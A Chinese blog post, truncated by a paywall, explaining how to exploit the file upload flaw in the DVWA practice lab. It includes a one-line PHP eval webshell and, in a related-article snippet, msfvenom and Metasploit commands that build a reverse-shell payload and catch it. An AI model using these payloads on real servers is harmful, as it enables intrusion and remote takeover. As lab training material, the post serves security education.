DVWA文件上传漏洞(upload)

最新推荐文章于 2025-10-04 14:17:14 发布
原创 最新推荐文章于 2025-10-04 14:17:14 发布 · 2.2k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细介绍在DVWA平台上针对不同级别的文件上传漏洞的利用方法,包括直接上传、使用BurpSuite代理上传以及通过文件合并绕过限制的技术细节。

目录

1、low级别(直接上传)

1.1 上传文件

1.2 验证

2、medium级别(使用Burp Suite进行代理)

2.1 进行代理配置

2.2 文件上传

2.3 验证

3、high级别(进行文件合并)

3.1 文件创建

3.2 上传及验证

1、low级别(直接上传)


<?php
    if (isset($_POST['Upload'])) {

            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename( $_FILES['uploaded']['name']);

            if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                
                echo '<pre>';
                echo 'Your image was not uploaded.';
                echo '</pre>';
                
              } else {
            
                echo '<pre>';
                echo $target_path . ' succesfully uploaded!';
                echo '</pre>';
                
            }

        }
?>

PHP端实现文件上传的功能,不设置任何的检测,可以上传任意类型、任意大小的文件。

所以可以直接上传shell文件,上传完成后使用菜刀。

1.1 上传文件

shell.php文件的内容如下,只有一句话:

<?php @eval($_POST['123']);?>

在DVWA进行文件上传。

 

为了验证是否上传成功,可以进入这个网址,如果不出现NOT FOUND说明上传成功;

也可以去靶机下进行查看,靶机中的路径为/var/www/dvwa/hackable/uploads。

最低0.47元/天 解锁文章
DVWA文件上传漏洞
sunshine1_0的博客
01-20 2211
文件上传漏洞 低级别 中等级别 高级别
dvwa中的文件上传漏洞
热门推荐
无痕的博客
01-12 1万+
dvwa漏洞环境演示文件上传漏洞
DVWA靶场之五:上传文件漏洞(File Upload
最新发布
YoungLime的博客
10-04 785
上传文件漏洞(File Upload Vulnerability)是指 Web 应用允许用户上传文件,但没有对上传的文件进行严格的验证和限制,导致攻击者可以上传恶意文件(通常是脚本或可执行代码),并在服务器上执行。原理可能的危害。
DVWA文件上传漏洞
m0_59448417的博客
10-10 602
通常在一些网站中都有文件上传的一个功能,比如上传头像或者背景之类的,这就是一个注入点。在这里我们可以上传webshell来达成一些目的。这里以DVWA里的靶场给大家做个解析。提示:以下是本篇文章正文内容,下面案例可供参考。
文件上传漏洞——DVWA练习
Lemon's blog
08-03 1666
前言:文件上传漏洞是很常见的漏洞,也非常有趣,接下来就在DVWA靶场中边学边练。 low级别 观察源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/upl...
DVWA文件上传漏洞
Feng_Blue_的博客
10-19 888
low等级 通过分析源代码,第一条只是分析上传是否为空,第二句则是文件的上传路径,第三条则是名字,可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。 如果上传成功,则会提示 路径+succesfully uploaded! 如果上传失败,则会提示 Your image was not uploaded。 我们尝试上传一个一句话木马 使用菜刀链接 菜刀可以完全访问 Medi...
DVWA文件上传漏洞之High渗透测试
Xlucas的博客
08-11 971
DVWA文件上传漏洞之High的渗透测试
DVWA文件上传漏洞低级_中级_高级
weixin_42786460的博客
09-01 1013
DVWA文件上传漏洞低级_中级_高级
DVWA 文件上传漏洞
QYbkx974的博客
11-16 1715
本次将通过从低到高三个等级的漏洞讲解 DVWA 靶场的文件上传漏洞
DVWA-File Upload(文件上传)
简简的博客
02-02 620
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA~文件上传漏洞
里丘~班诺的小屋
05-09 1278
靶机介绍 实验原理 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell 一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 SQL注入攻击的对象是数据库服务,文件上传漏洞
DVWA文件上传漏洞
极光时流
03-31 767
Low 没有进行任何过滤 首相,上传一个phpinfo.php,其内代码如下: <?php phpinfo(); ?> 上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php 然后访问 首先,写好 说明存在上传和执行漏洞 上传一句话木马: <?php @eval($_POST[“hack”]); ?>...
Dvwa文件上传漏洞
JBlock的博客
11-16 4326
今天到了比较有意思的地方,一句话我们要传木马啦!这个就比较有意思了,毕竟我们查找漏洞最想要的效果之一就是传马成功,获得我们想要的权限。 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 因为我用的web容器是Apache,所以暂且只介绍Apache的文件解析漏洞。 比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,A
metaploit dvwa文件上传漏洞
01-04
### Metasploit与DVWA文件上传漏洞利用 #### 背景介绍 安全测试人员经常使用工具如Metasploit来评估Web应用程序的安全性。对于存在已知漏洞的应用程序,比如具有不同级别安全性设置的 Damn Vulnerable Web Application (DVWA),可以模拟攻击场景以验证其脆弱点。 #### 文件上传漏洞原理 当Web应用允许用户上传文件到服务器上而未做充分校验时,则可能存在安全隐患。如果攻击者能够绕过这些防护机制成功上传恶意脚本(例如PHP木马),那么就可以远程控制该网站甚至整个服务器环境[^4]。 #### 使用Metasploit框架进行漏洞利用 为了展示如何利用这样的缺陷,在受控环境中可以通过以下方式操作: 1. **启动目标服务** - 配置好DVWA实例,并将其调整至较低难度模式以便于学习目的。 2. **准备有效载荷(Payload)** ```bash msfvenom -p php/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=8080 -f raw > shell.php ``` 3. **修改Payload伪装成图片或其他合法格式** 这一步是为了避开简单的文件类型过滤器。具体做法可能涉及更改文件扩展名或将实际代码嵌入看似无害的内容之中。 4. **实施攻击** 登录进入DVWA平台后找到“File Upload”功能页面,按照提示提交之前创建好的shell文件。一旦上传完成,尝试通过浏览器或者其他手段触发执行此文件。 5. **建立连接监听** 在本地机器开启Meterpreter session等待来自受害者主机的消息回连请求: ```bash use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost YOUR_IP set lport 8080 run ``` 此时应该可以在Kali Linux终端观察到来自靶机的新建Session信息,意味着获得了进一步探索内部网络资源的能力[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值